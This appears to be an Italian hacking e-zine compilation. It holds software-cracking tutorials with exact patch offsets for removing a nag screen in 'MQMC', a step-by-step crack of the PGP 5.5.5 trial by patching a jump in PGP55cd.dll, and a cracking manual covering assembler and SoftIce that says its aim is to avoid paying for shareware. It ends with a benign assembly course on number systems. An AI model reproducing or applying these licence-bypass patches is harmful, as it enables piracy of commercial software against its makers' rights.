->"MQMC323.0" | :0048A46F mov eax, 0048A650 :0048A474 call 00444C24 :0048A479 mov eax, dword ptr [0049C28C] :0048A47E mov eax, dword ptr [eax] :0048A480 call 00432A34 * Jump at Addresses: |:0048A281(U), :0048A415(C) | :0048A485 call 00409148 :0048A48A call 00402A98 :0048A48F lea ecx, dword ptr [ebp-38] :0048A492 mov edx, 00000004 :0048A497 call 00489F6C :0048A49C mov edx, dword ptr [ebp-38] :0048A49F lea eax, dword ptr [ebp-50] :0048A4A2 call 00404C60 :0048A4A7 lea ecx, dword ptr [ebp-50] OK perfetto... lavoro praticamente finito... per eliminare il nag basta cambiare i 3 JUMP indicati sopra in JMP incondizionali. Come fare ve l'ho gi... spiegato sopra... e infine rinominare prima il file MQMC.exe come cazzo volete, poi la sua copia in MQMC32.exe. Tutto chiaro? Bene: PROGRAMMA CRACKATO. RIASSUMENDO INDIRIZZI HA CAMBIARE: Per il programma: 48A1ED (OFFSET 895ED da je a jmp). Per il nag-screen: 48A1E3 (OFFSET 895E3 da jne a jmp), 48A394 (OFFSET 89794 da jnb a jmp), 48A415 (OFFSET 89815 da jbe a jmp). OK ho finito... uff che fatica... non pensavo che scrivere un tute fosse cos lungo... Bene, spero che esso vi sia stato utile, io da parte mia ho cercato di scriverlo nel migliore dei modi, cio semplice e comprensibile a tutti. Se vi piace, non vi piace, volete insultarmi, ecc.... basta che mandiate un'e-mail all'indirizzo sotto. Vorrei ora ringraziare un bel po' di persone..... ometto di dilungarmi troppo sulle rispettive motivazioni, altrimenti questa parte viene pi- lunga dell'Essay... Ringrazio e saluto: Quequero innanzi tutto (spero di riuscire a vederti prima o poi in IRC! :-))) per aver publicato il mio tute sull'UIC, per l'impegno che sta dimostrando con l'UIC stessa e perch mi risponde a tutte le domande che gli faccio: ciao QUEEEE!!, [aLT255], ^courier, mOoNsHaDoW e WhiteFly, sempre molto disponibili su IRC, xOANINO (il mito), tutti i Ringzer0 (per i loro tute e perch sono GRAAANDIII), in generale tutto il chan di #crack-it e tutti gli Attila_Hack members, in particolare BoBo, che mi ha fatto partecipe di questa iniziativa e che mi ha permesso di pubblicare qui i miei tute. Grazie BOBO!! Sei un amicoooo :) !! Saluto anche DFX, great friend nonch compagno di scuola, il Morando (altro amico) e coloro che sono arrivari a leggere fino in fonto questo tute... GRAZIEEEEE!!!! E mi raccomando: citando una frase di...azz chi era... boh... non so, spero che costui mi perdoner per il copyright violato... ricordate: "A day without learning is a lost day..." Impariamo, gente, impariamo. SeE YoU sOoN, **************************************************** * * * Ritz * * Eclyps3@excite.com * * - The way is made clear when viewed from above - * * On ICQ: 41793377 * * On IRC: Ritz * * * **************************************************** +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- CRACCARE PRETTY GOOD PRIVACY 5.5.5 ******************************* * * * Pretty Good Privacy 5.5.5 * * * * by Ritz * * * ******************************* ****************************************************************************** DESCLAIMER LEGALE: Ascoltatemi bene prima di leggere questo articolo: esso stato scritto a PURO scopo DIDATTICO: io, Ritz, non incoraggio chi volesse servirsene per scopi illegali; inoltre non mi assumo alcuna responsabilit... se vi autodistruggete i progammi. CAPITTOOOO?! ****************************************************************************** Allora, in questo tute cercher di spiegarvi come a volte le protezioni di un programma possano rivelarsi pi- semplici del previsto... l'unico problema sapere dove CERACRLE!! Il proggy in questione Pretty Good Privacy 5.5.5: penso sappiate tutti a che serve: un proggy di crittazione a chiave asimmetrica, cio per crittare e decrittare non si usa la stessa chiave... molto sicuro quindi per scambiarsi ad esempio e-mail senza essere sgamati. Consiglio di acquistarlo perch dopotutto bisogna ricompensare i programmatori della Network Associates che hanno fatto un cos buon lavoro (a parte la protezione facilmente scazzabile :)))). Lo trovate cmq dappertutto. OK se parte... Installato il PGP? S? Bene, avviatelo... anzi no... prima cavate l'icona dal Tray, quindi portate la data del Windouz avanti di 46 anni. Riavviate il PGP. Vi appare un nag screen del cazzo che vi dice che i prog scaduto? Bene, siete a cavallo! Entrate in Sice con CTRL+D e mettete un bpx messageboxa per intercettare l'API che fa apparire il messaggio. Uscite dal Sice e caricate il Pretty Bad Protection (scherzo eh?) da Start/Programmi/Pretty Good Privacy/PGPtools. Ora ci dovremmo aspettare che il debugger poppi prima della schermata: INFATTI! BINGO! Premete F11 per entrare nella DLL (o l'EXE) che genera la chiamata, e, azz, appare la schermata del proggy... pork putt, come mai non siamo entrati nel codice? Boh, cliccate su OK e.... il SoftIce ripoppa! Questa volta diretamente su una DLL del PGP: PGP55cd.dll, localizzata in C:\WINKAZ\SYSTEM, e precisamente in questo punto: :0048A202 POP EDI Bene, ora non vi resta che fare una cosa: disassemblate la cara PGP55cd.dll col Dasm. Fatto? Vabb... tanto per sicurezza andiamo a guardare le String Data References, sar impossibile trovare qualcosa, cmq tentiamo: clicchiamo sul secondo pulsante della barra partendi da destra, osserviamo un po' le stringhe... hum hum... mumble mumble... osservate un po' la nona partendo dal basso: "Thank you for evaluating Pretty", cazzo ma non la parte iniziale del testo della messagebox da fottere? fateci doppio clic sopra; vi troverete qui: * Jump at Address: |:10002814(C) | :10002867 cmp dword ptr [esp+24], 00000002 :1000286C jne 10002876 :1000286E add dword ptr [esp+08], 00278D00 * Jump at Address: |:1000286C(C) | :10002876 cmp esi, dword ptr [esp+08] :1000287A jbe 10002881 <--- Mi suona sinistro jump if below or equal... * Possible Reference to String Resource ID=00001: "General strings" | :1000287C mov edi, 00000001 * Jump at Address: |:1000287A(U) | :10002881 mov eax, edi :10002883 pop edi :10002884 pop esi :10002885 add esp, 00000014 :10002888 ret :10002889 nop :1000288A nop :1000288B nop :1000288C nop :1000288D nop :1000288E nop :1000288F nop * Referenced by a CALL at Address: |:100027A2 | :10002890 sub esp, 00000400 :10002896 mov ecx, 00000040 :1000289B lea eax, dword ptr [esp] :1000289F push esi :100028A0 push edi * Possible StringData Ref from Data Obj ->"Thank you for evaluating Pretty " ->"Good Privacy. The 60" | :100028A1 mov esi, 100280F8 :100028A6 lea edi, dword ptr [esp+08] :100028AA repz :100028AB movsd :100028AC mov ecx, dword ptr [esp+0000040C] :100028B3 push 00000000 :100028B5 movsw Visto bene il codice...? Dunque a :100028A1 viene generata il nag-screen, quindi nei dintorni ci dovrebbe essere qualcosa di utile... vediamo un po'... osservate :1000287A, un jbe.. cambiandolo in je o JMP forse... naaaa troppo facile... cmq vale la pena tentare, vero? Segnatevi l'OFFSET (1C7A) e cambiatelo con HIEW (non vi spiego come si fa, se non lo sapete leggete l'altro mio tutorial :))): provate a mettere, che so, jump incondizionale, tanto 99% non funzioner... fatto? Bene, avviate il PGP, e pork putt azz tr!! Programmillo crackato!! Facile no? Beh, che dire, tute finito. Non ho altro da aggiungere. Vabb, non mi resta che augurarvi H A P P Y C R A C K I N G!!! N.B.: ricordatevi di riportare indietro la data di WINCESS dopo avre finito tutto eh? P.S.: mi venuta in mente appena ora una cosa interessante che non centra nulla col cracking: il calendario di Windozz dovrebbe fermarsi al 2099: se io imposto la data al 31 dicembre 2099 e poi il giorno dopo riavvio che succede? Magari vengo trasportato in un'altra dimensione dove tutto posseduto da Microsoft e il dittatore assoluto Bill Gates... meglio lasciar perdere... se qualcuno ha il coraggio di farlo... mi scriva per comunicarmi i risultati... :-)))) Vorrei ringraziare e salutare anche questa volta Quequero (ma vi pensate, mi ha pubblicato anche questo articolo: semplicemente GRANDEEE), i ring0, il chan #crack-it, gli Attila_Hack members (spec. BoBo), DFX e il Moran'. Grazie inoltre a chi arrivato a leggere fino a qui e ne ha tratto profitto :)). Per qualsiasi cosa, scrivetemi [se usate il PGP (per il crack basta che cerchiate in rete... ihihihihih) mandatemi la vostra chaive]. ZeE yOu ZoOn, **************************************************** * * * Ritz * * Eclyps3@excite.com * * - The way is made clear when viewed from above - * * On ICQ: 41793377 * * On IRC: Ritz * * * **************************************************** +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- ===================================================================== Manuale di Cracking - by S2 Prima parte ===================================================================== 1. Prefazione Per iniziare vorrei subito dire che tutto quello che segue non e' assolutamente da prendere sul serio e non e' assolutamente da fare o provare. Anzi, e' assolutamente illegale, e quindi, se non volete dire "ciao" a un pulotto che suona al vostro campanello perche' siete diventati pirati informatici non fatelo. Bene bene bene... Detto questo un ciao a tutti voi che avete una gran voglia di fottere tutti quei programmini Shareware del cazzo che dopo trenta giorni di evaluation non funzionano piu', o quelli che danno possibilita' limitate a meno che non inseriate la mistica password associata all'user name inserito ecc... vi siete proprio rotti le balle... vero? Io almeno, confesso che me le sono rotte, e quindi... aguzzo l'ingegno e inculo tutte quelle softwarehouse che ti chiedono 20$ per il loro programma. Ma se vi devo dire la verita' non lo faccio solo per questo, ma anche per un altro motivo: Quando riesco a mettere insieme tutti i pezzi del puzzle, e vedo sullo schermo del mio bel pc una finestrella che mi dice "Tnx for registering" mi sento un grande. Perche' penso di essere uno dei pochi su questa faccia della terra a essere in grado di farlo, e quindi mi sento un figo. Comunque, quando poi ripenso ai 20$ risparmiati sono ancora piu' felice... Quindi questo manuale non e' da vedere come un manuale al crackaggio, ma piu' come un manuale della felicita'... che umorista che sono... io non devo passare tutte queste ore davanti al pc... poi mi metto a scrivere stronzate del genere... sono proprio fuso... vabbe'... mi accendo una cicca, va'. In ogni caso questo non e' un manuale di Assembler, quindi non aspettatevi particolari sull'asm, quelli li trovate in inglese in giro per Internet, ma e' una guida al crackaggio. Quello che voglio insegnare non e' come trovare le password associate agli user name, ma semplicemente come avere l'accesso. Per riuscire a scoprire la password, avete bisogno di conoscere un sacco di asm e soprattutto dovete farvi un pacco cosi' di matematica... ma questo e' un altro file... forse in futuro ve lo scrivero'... Adesso andiamo al sodo e cominciamo: 2. Breve introduzione all'Assembler Allora. Per crackare un programma bisogna disassemblarlo, cioe' tradurre il programma .exe o .com in una lista di istruzioni da noi comprensibili, per poi modificarlo in modo da fargli credere di aver inserito la password giusta, o che i 30 giorni non sono passati e cosi' via. Siccome per disassemblare i programmi da crackare si usa il SoftIce, che disassembla i programmi in Assembler (asm), bisogna sapere questo linguaggio. Voi direte, "ma non possiamo tradurre il programma in italiano, cosi' lo capiscono tutti?". E io vi rispondo, ci sto lavorando, ma quando avro' finito lo distribuiro' in una versione Shareware incrackabile! Tje'! Ok. Ora vi spiego un po' come funziona l'Assembler: 2.1 I registri La CPU del computer e' divisa in diversi registri, che ora vi spiego uno per uno cosa sono e come si chiamano, e servono per memorizzarci dei dati. I registri in tutto sono quattro, e si chiamano AX - Accumulatore BX - Base register CX - Contatore DX - Data register Ognuno di questi registri puo' essere suddiviso in una parte alta e una bassa. Per esempio AX si suddivide in AL (Low) e AH (High). Nella CPU del Pentium, che lavora a 32 bit, i registri si chiamano EAX, EBX e cosi' via. Mi spiego meglio con questo schemino: AL = 8 Bit (parte bassa del registro AX) AH = 8 Bit (parte alta del registro AX) AX = 16 Bit (formato da AL e AH messi insieme) EAX = 32 Bit (formato da AX e altri 16 Bit che pero' non sono direttamente acessibili dall'utente) Ovviamente questa suddivisione vale anche per BX, CX e DX. Poi ci sono i segment register: CS - Vuol dire Code segment. E' l'area di memoria nella quale si trova il programma che state modificando. L'indirizzo CS:IP e' l'istruzzione che state per eseguire. DS - Il Data segment. La parte di memoria nella quale si trovano i dati. La CPU di solito vi accede solo in lettura. ES - Extra segment. In questa area di memoria la CPU vi accede in scrittura. IP - Instruction pointer. E' l'indirizzo dell'istruzione che state per eseguire. SS - Stack segment. Questa e' roba complicate... non vi serve per i vostri scopi crackistici. SI - Source Index. E' un puntatore. DI - Destination index. Un'altro puntatore. BP - Base pointer. Questo viene usato insieme allo SS. SP - Stack pointer. Serve a puntare una locazione all'interno dello Stack. E' usato insieme a SS. Questi sono i registri della CPU, le informazioni qui riportate, non sono complete, ma non staro' neanche qui' a completarle, perche' per i nostri loschi scopi non sono di importanza rilevante. Se proprio volete saperne di piu' andate a leggervi una delle tante guide sull'Assembler che si trovano in giro per Internet. 2.2 I flag Servono ad indicare se un jump condizionale (vedi sezione istruzioni) deve essere eseguito o no. Per esempio CMP AL, BL ........... Confronta il registro al con bl JZ 3F1D ................... Salta se zero a 3F1D La prima istruzione esegue un confronto tra AL e BL. Se sono uguali il flag Z diventa 1 (attivo), nel caso contrario invece, 0 (disattivo). La seconda istruzione salta all'indirizzo specificato se il flag Z e' 0. Se per esempio in AL abbiamo il numero di giorni da quando stiamo usando il programma, e in BL, il numero di giorni che il programma deve funzionare, modificando il flag zero possiamo far credere al programma che i giorni ancora non sono finiti, e quindi possiamo continuare ad usare il programma. Capito? Mettiamo il caso: AL = 3 .................... Stiamo usando il prog. da 3 giorni BL = 1E .................. (1E = 30 in Hex) Per quanti giorni possiamo usare il prog. Premesso questo, ora eseguiamo i comandi: CMP AL, BL ........... Confronta il 3 con il 30d JZ 3F1D .................. Se i due sono uguali (tutti e due 30, flag Z = 1) salta a 3F1D e ci dice di registrare il programma Tutto chiaro? Penso di si... queste sono cazzate da capire in fondo, credo. 2.3 Le istruzioni MOV Dest. Source - Sposta un valore da Source a Dest. Per esempio MOV AL, BL - Sposta il contenuto di BL in AL. CMP var1, var2 - Confronta i due valori di var1 e var2. Per esempio CMP AL, BL - Confronta il contenuto di AL con quello in BL. Semplice no? Be'... questa istruzione funziona come una sottrazione: il valore in var2 viene sottratto da var1. Cioe', se ho 3 in AL, e 8 in BL, il risultato sara' 3 - 8 = -5. Il flag Carry (C) si attivera' (questo flag si attiva ogni volta che il numero e' negativo). Nel 99,9% dei casi questo comando viene usato per confrontare la password da voi inserita e quella giusta, oppure come nell'esempio sopra, i giorni trascorsi, e quelli trascorribili (ma esiste questa parola?). JMP label - Questa e' l'istruzione piu' bella. Esegue un salto all'indirizzo specificato. Lo troverete, di solito dopo un CMP. Ci sono diverse variazioni di questo comando, che ora vi elenchero', e vanno tutte a controllare i flag Z, O, S, C e P. Nella sua forma piu' semplice e' JMP label, cioe', salta a label qualsiasi siano i valori dei flag. Ponendo il comando CMP AX, BX, abbiamo: JNZ - Jump if not zero, AX diverso da BX JZ - Jump if zero, AX uguale a BX JB - Jump if below, AX < BX, C = 1 JA - Jump if above, AX > BX, C = 0 JNGE - Jump if not greater or equal, AX<=BX, S diverso da 0 JGE - Jump if greater or equal, AX=>BX, S = 0 JLE - Jump if less or equal, AX<=BX, Z=1 o S=F Che palle! Vabbe'... cen'e' altri di 'sti' JMP, ma non credo che vi servano per i vostri loschi scopi, quindi non preoccupatevi... anche se non li sapete non cambia un cazzo. Comunque, se proprio vi interessano li trovate in un qualsiasi manuale di Assembler in giro per Internet. CALL label - Richiama una routine che si trova all'indirizzo specificato con label. Per esempio CALL 1F3D, esegue la routine a CS:1F3D. Poi, eseguendo la routine, quando trova un'istruzione RET torna all'istruzione dopo CALL. Facile no? Di solito, quelle chiamate con CALL sono delle routine che controllano il testo da voi inserito, oppure criptano la password che avete inserito ecc. INT n - Esegue un'interruzione. Un'interruzione e' come una routine, pero' non e' nel programma, ma da qualche parte nel DOS, o nel BIOS, dipende dalla n. Per esempio quei giochini vecchissimi che chiedevano il KeyDisk inserito usavano l'int 13 per vedere se c'e'ra il dischetto inserito o no ecc. Comunque cazzate... in Windows gli INT non esistono quasi piu'. That's it. Questi sono i comandi principali dell'asm. Spero che gli abbiate capiti, perche' senza questi poi non ci capirete una minchia nel SoftIce. Anzi... se volete approfondire, c'e' il Assembly language foundamentals tutorial che aspetta solo di essere letto e studiato. I comandi che vi ho dato qui sono pure pochi, ma comunque quelli piu' importanti. 3. L'uso del debugger Ok. Aspettate un'attimo che mi accendo una cicca... fumo troppo... ma vabbo'. Per spiegarvi come funziona il SoftIce vi traduco semplicemente le parti piu' importanti della guida che trovate anche compattata nel file SoftIce.zip. Cosi' risparmio la fatica di pensare ai comandi. Allora... intanto i consiglio di mettere una robe del genere alla fine del vostro Autoexec.bat: choice /tn,2 Caricare softice? if errorlevel 2 goto win c:\softice\winice (qui' mettete la righa che vi aggiunge il SoftIce nell'installazione) goto end :win choice /ts,1 Caricare windows? if errorlevel 2 goto end win :end Ed ora passiamo ai comandi principali del SoftIce: 3.1 I comandi del SoftIce E' impossibile debuggare bene senza sapere come funzionano i BreakPoints (Bp). Un bp e' un'istruzione per la cpu che le dice di fermare l'esecuzione del programma dopo un accesso ad una certa locazione di memoria, oppure dopo certi eventi del programma stesso e da' il controllo al debugger. Quando setti un bp del SoftIce e poi torni al programma che stai usando, SoftIce compare automaticamente quando la condizione per la quale e' settato il bp e' verificata. 3.1.2 BreakPoint Bc # : Clear Breakpoint--elimina un breakpoint messo in precedenza nel Soft-Ice; devi sapere il numero del bp... Bd # : Disable Breakpoint--disabilita il bp ma non lo cancella; devi sapere il numero del bp... Be # : Enable Breakpoint--abilita il bp che hai disabilitato in precedenza; devi sapere il numero del bp... Bl : List Breakpoints--mostra una lista di tutti i bp settati nel softice, il loro stato (abilitato, disabilitato), e il loro numero. Bmsg : Break on Windows Message. Sintassi: BMSG window handle L begin-message end-message Bpint : Break on Interrupt. Funziona solo con le interruzioni trattate da IDT (95/NT). Sintassi: BPINT int-number Bpio: Si ferma quando c'e' un accesso in lettura o scrittura ad una porta I/O con un certo indirizzio. Sintassi: BPIO port [R|W|RW] [EQ|NE|GT|LT|M value] [c=count] Bpm: Si ferma quando c'e' un accesso alla memoria in lettura (read), scrittura (write), o esecuzione (execution). Sintassi: BPM[B|W|DW] address [R|W|RW|X] Bpx : Break on execution. Sintassi: BPX address/symbol [c=count] [EQ|NE|GT|LT|M value] [c=count] Bpr : Break on memory range. Sintassi: BPR start-address end-address [R|W|RW|T|TW] [expression] Bprw : Break on program/code segment. Sintassi: BPRW module-name|selector [R|W|RW|T|TW] [expression] 3.1.2 Steppare attraverso il programma Debuggare in se' vuol dire eseguite una istruzione alla volta di un programma in modo da poter vedere come cambiano la memoria, i registri, i flags e le variabili. I principali comandi per farlo sono: P : Esegue una istruzzione e vede le CALL come una istruzzone sola. Shortcut: il tasto F10. P RET : Esegue il programma finche non trova un'istruzione RET. Shortcut: il tasto F12. T : Esegue una istruzzione. Shortcut: il tasto F8. 3.1.3 Visualizzare informazioni sul sistema Addr : Visualizza o cambia ad un contesto di indirizzi. Class : Visualizza informazioni sui Windows Classes. CPU : Visualizza i registri della CPU. Exp : Carica/Visualizza i simboli esportati da un DLL. GDT : Visualizza la Global Descriptor Table. Heap : Visualizza i Global Heap di Windows. Heap32 : Visualizza/attraversa i Global Heap di Windows. HWND : Visualizza informazioni sui Windows Handles. IDT : Visualizza la Interrupt Descriptor Table. LDT : Visualizza la Local Descriptor Table. LHeap : Visualizza i Windows Local Heap. Map32 : Visualizza una mappa di memoria di tutti i moduli a 32bit caricati in memoria. MapV86 : Visualizza la mappa di memoria DOS memory della macchina virtuale corrente. Mod : Mostra la Windows Module List. Page : Mostra le Page Table information. Proc : Visualizza informazioni su un processo. Stack : Visualizza una call stack. Sym : Imposta o visualizza un Symbol. Task : Mostra Windows Task List. VCall : Mostra i nome e indirizzi di una routine VxD chiamabile con CALL. VM : Visualizza informazioni sulle macchine virtuali. VXD : Visualizza la mappa Windows VXD. .VMM : Chiama il VMM Debug Informational Services menu. .VPICD : Chiama il VPICD Debug Information Menu. .VXDLDR : Mostra informazioni VXD. WMSG : Visualizza i nomi e numeri dei messaggi Windows. Inoltre, cosa molto importante, che stavo quasi per dimenticarmi, c'e' da dire che nel SoftIce ci entrate con CTRL-D. Figo, no? +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- La seconda parte di questo fantastico tute sar presente su Wannabe 2 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- __ _ / _\ ___ ___(_) ___ _ __ ___ \ \ / _ \_ / |/ _ \| '_ \ / _ \ _\ \ __// /| | (_) | | | | __/ \__/\___/___|_|\___/|_| |_|\___| ___ BoBo & LaNdo _ / _ \_ __ ___ __ _ _ __ __ _ _ __ ___ _ __ ___ (_)_ __ __ _ / /_)/ '__/ _ \ / _` | '__/ _` | '_ ` _ \| '_ ` _ \| | '_ \ / _` | / ___/| | | (_) | (_| | | | (_| | | | | | | | | | | | | | | | (_| | \/ |_| \___/ \__, |_| \__,_|_| |_| |_|_| |_| |_|_|_| |_|\__, | |___/ |___/ Introduzione: by b0nu$ =========================================================================== Questi file sono protetti dal diritto d'autore e sono liberamente riproducibili a condizione di non farne uso comemrciale o economico o per fine di lucro senza la preventiva autorizzazione dell'autore. In ogni caso deve sempre essere indicato il nome dell'autore e il suo indirizzo. Ogni altra modalita' di utilizzo deve considerarsi contraria alla volonta' dell'Autore. =========================================================================== Al giorno d'oggi esistono molti linguaggi di programmazione ad alto livello con i quali possibile creare programmi complessi, piu' o meno efficienti e con i quali possibile programmare ogni parte di un computer, ma se si vuole sfruttare al meglio le risorse messe a disposizione dal PC , se si vuole scrivere routine veloci allora l'unico linguaggio adatto ancora il buon vecchio ASSEMBLY. Programmando in Assembly si ha il controllo completo del computer ogni singolo bit di ogni singolo registro nelle tue mani, hai il potere assoluto sulla macchina, per ... Per e anche vero che programmare in Assembly non del tutto facile, si deve tener conto di moltissime cose, un piccolo particolare trascurato ha come conseguenza il CRASH del sistema!! Una prerogativa della programmazione in Assembly la conoscenza dell'Hardware sottostante , quindi necessario conoscere la struttura della CPU dei registri delle porte e delle schede presenti per poterle programmare. In questa serie di tutorial vorrei cercare di spiegare per passi la programmazione in Assembly cominciando dalle cose cose piu' semplici e via via andando sempre piu dentro nella programmazione dei vari componenti di un moderno Personal Computer. Vi renderete conto voi stessi che ad un certo punto pi che un corso di programmazione diventer un corso di Hardware per calcolatori. I tools di cui avrete bisogno sono un COMPILATORE e un LINKER , i miei esempi sono scritti per il compilatore della Borland TASM 3.1 ma si possono facilmente adattare ad altri compilatori. Inoltre dovreste procuravi una documentazione degli interrupt del BIOS e del DOS reperibile via FTP al sito : X2FTP.OULU.FI (Si tratta della famosissima lista di Ralph Brown). Infine si serve un editor di testo, va bene anche l'EDIT del DOS ma vi consiglio un ambiente integrato per programmare in Assembly reperibile anche questo su internet al sito WWW.INF.TU-DRESDEN.DE/~OK3 , si tratta dell'ASM EDITOR scritto da Olaf Krusche e Tilo Elstner ( questo vi facilita molto il lavoro di compilazione e linkaggio). Beh ora basta con le chiacchiere cominciamo ad addentrarci nel magnifico mondo della programmazione in ASSEMBLY.... buon lavoro! Sistemi di numerazione ed elementi di logica: by b0nu$ Ogni buon programmatore dovrebbe conoscere almeno 2 sistemi di numerazione oltre quello decimale imparato alle scuole elementari: il sistema BINARIO e quello ESADECIMALE. Il sistema di numerazione binario particolarmente legato ai calcolatori in quanto essi possono riconoscere solo segnali aventi due valori : uno alto e uno basso; per cui si associa al valore alto la cifra binaria 1 e a quello basso la cifra binaria 0 (oppure H e L, o ancora VERO e FALSO). Infatti nel sistema binario esistono solo due cifre 0 e 1 appunto e i numeri ma anche tutte le altre informazioni vengono rappresentate con sequenze di Zero e di Uno. Il sistema di numerazione binario un sistema posizionale come quello decimale, cosa vuol dire: consideriamoli numero decimale 237 , esso pu essere scomposto in questo modo: 237 = 2 * 10^2 + 3 * 10^1 + 7 * 10^0 ossia le cifre del numero vengono moltiplicate per le potenze di dieci (da cui decimale) crescenti da destra verso sinistra. I numeri binari vengono costruiti nello stesso modo solo che invece di potenze di 10 si usano le potenze di 2, quindi considerando il seguente numero binario, scomponendolo ed effettuando i calcoli si ottiene il corrispondente numero decimale : 11010010 = 1*2^8 + 1*2^7 + 0*2^6 + 1*2^5 + 0*2^4 + 0*2^3 + 0*2^2 + 1*2^1 + 0*2^0 = 210 Ora che abbiamo visto la conversione Base 10 -> Base 2 vediamo come si effettua l'operazione inversa. L'algoritmo abbastanza semplice : 1 - Si divide la cifra decimale per 2 2 - Se il quoziente pari si scrive 0 se dispari 1 3 - Si divide il quoziente ancora per 2 e si ripete il passo 3 4 - La sequenza ottenuta RIBALTATA la rappresentazione binaria del numero decimale Vediamolo applicato al numero decimale 145 (questo lo schema che di solito si utilizza): 145 | 72 | 1 ( cifra - significativa ) 36 | 0 18 | 0 9 | 0 4 | 1 2 | 0 1 | 0 0 | 1 (cifra + significativa ) Quindi 145 in base 10 equivale a 10010001 in base 2. Semplice vero ?? NOTA: Una cosa da notare che con N cifre binarie possiamo rappresentare tutti i numeri da 0 fino a 2^N-1. Ora che abbiamo conosciuto i numeri in base 2 andiamo a conoscere i numeri in base 16 che risultano utili in quanto ogni cifra esadecimale corrisponde a 4 cifre binarie e il passaggio da una base all'altra risulta facile. Tanto per cominciare le cifre del Sistema esadecimale sono 16, direte 10 le conosciamo ma le altre 6 ?? Beh si usano anche le prime sei lettere dell'alfabeto: DEC 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 HEX 0 1 2 3 4 5 6 7 8 9 A B C D E F Anche il sistema esadecimale posizionale e quindi la conversione Hex ->Dec si fa nello stesso modo visto prima ( naturalmente si usano le potenze di 16). Un'altra conversione che serve spesso quella da Esadecimale a Binario e viceversa. Sono entrambe molto semplici in quanto come dicevamo prima tutte le cifre esadecimali si possono codificare con quattro cifre binarie : Hex Bin 0 0000 1 0001 2 0010 3 0011 4 0100 5 0101 6 0110 7 0111 8 1000 9 1001 A 1010 B 1011 C 1100 D 1101 E 1110 F 1111 Quindi il numero esadecimale 3F5 corrisponde al 001111110101 3 F 5 Per il viceversa basta. prendere il numero binario a blocchi di 4 cifre (partendo dalla cifra meno significativa) e convertirli in cifre esadecimali: 10 0101 1101 0101 0010 0010 --> 2 0101 --> 5 1101 --> D 0101 --> 5 10 --> 2 Quindi corrisponder al numero 25D52 esadecimale !! Un altro sistema di numerazione adottato nel campo dei calcolatori fino a qualche tempo fa era quello ottale (base 8), che lascio immaginare a voi come funzioni !! In un programma assembly per specificare la base di numerazione si fa seguire al numero una lettera : b - Binario (es. 0100101101b) o - Ottale (es. 543o) d - Decimale (es. 982d) h - Esadecimale (es. 0F23h) Adesso siamo in grado di rappresentare solo i numeri positivi e quelli negativi? Per questi i calcolatori utilizzano un metodo non sempre intuitivo: il complemento a 2. Vediamo subito un esempio per capire come funziona, consideriamo il numero 5 e rappresentiamolo in binario a 8 bit : 00000101, calcoliamo da questo la rappresentazione binaria di -5, si procede nel seguente modo : 1 - Si complementano tutti i bit (0-->1 e 1-->0) 00000101 |||||||| 11111010 2 - al numero ottenuto si somma 1 11111010 + 1 ---------- 11111011 3 - Il numero ottenuto la rappresentazione binaria di -5 Per fare la verifica provate a sommare 5 a -5 e vedrete che otterrete 0 (attenzione : il bit eventuale di overflow viene perso in quanto nel nostro esempio abbiamo specificato che stiamo usando solo 8 bit; anche in un calcolatore comunque il numero di bit limitato dalla dimensione dei registri) Quindi con n bit possiamo rappresentare i numeri da -2^(n-1) a 2^(n-1)-1 (es. con 4 bit da -8 a 7) e il bit piu' significativo indica il segno: se 1 vuol dire che il numero negativo. Oltre al codice binario normale a volte sono utili altre rappresentazioni binarie dei numeri decimali (utili come vedremo piu' avanti per le operazioni algebriche) come ad esempio la notazione BCD (Binary Code Decimal). In BCD le 10 cifre del codice decimale vengono codificate una ad una con 4 bit nel seguente modo: Decimale 0 1 2 3 4 5 6 7 8 9 BCD 0000 0001 0010 0011 0100 0101 0110 0111 1000 1001 Cos per rappresentare il numero decimale 145 basta codificare le sue cifre (1,4 e 5) con il rispettivo codice BCD : 145 --> 101000101 L'Assembly non un linguaggio tipizzato, nel senso che non esiste il tipo int, float, ecc... sta al programmatore trattare i numeri in modo diverso a seconda di cosa essi rappresentano nel momento in cui li usa. In binario vengono rappresentati anche i caratteri. Per ogni carattere si usano 8 bit, per un totale di 255 caratteri, per le corrispondenze carattere-codice si fa riferimento alla convenzione ASCII. Tutti abbiamo da qualche parte una tabella dei codici ASCII. Oltre a saper rappresentare i numeri binari bisogna saper fare anche le operazioni con essi, spendero' solo poche parole ma una volta capito il meccanismo di base riuscirete benissimo a risolvere complesse operazioni !!!. Per capire come si effettua una somma basta pensare a cosa avviene con i numeri in base 10 e ricordarsi che in base 2 ci sono solo due cifre. Quindi (in base 10) se sommo 7 a 6 scrivo 3 con il riporto di 1, sommo il riporto a 0 e unendo i risultati ottengo (magia) 13. In decimale il riporto si ha quando la somma supera 10 in binario quando la somma supera 2, quindi ad esempio: 10100011 + 10100101 ---------- 101001000 Provate a fare qualche esempio vedrete che facilissimo, l'importante aver capito il meccanismo che sta alla base (se proprio non lo capite andate a rileggervi i quaderni delle elementari !!!!) Ora che abbiamo capito come fanno a "contare" i computer vediamo come fanno a fare altre utili operazioni, guardiamo in particolare le operazioni logiche. La logica un ramo della matematica che stabilisce se un predicato vero o falso(chiedo scusa ai matematici per la definizione un po'troppo semplicistica), quindi noi assegneremo il valore 1 a vero e il valore 0 a falso e il gioco fatto. Le principali sono: AND, OR, NOT, XOR. Noi ci chiederemo cosa risulta 1 and 1 oppure 0 or 1 ecc... Per brevit e data la semplicit riporto solo le tabelle di 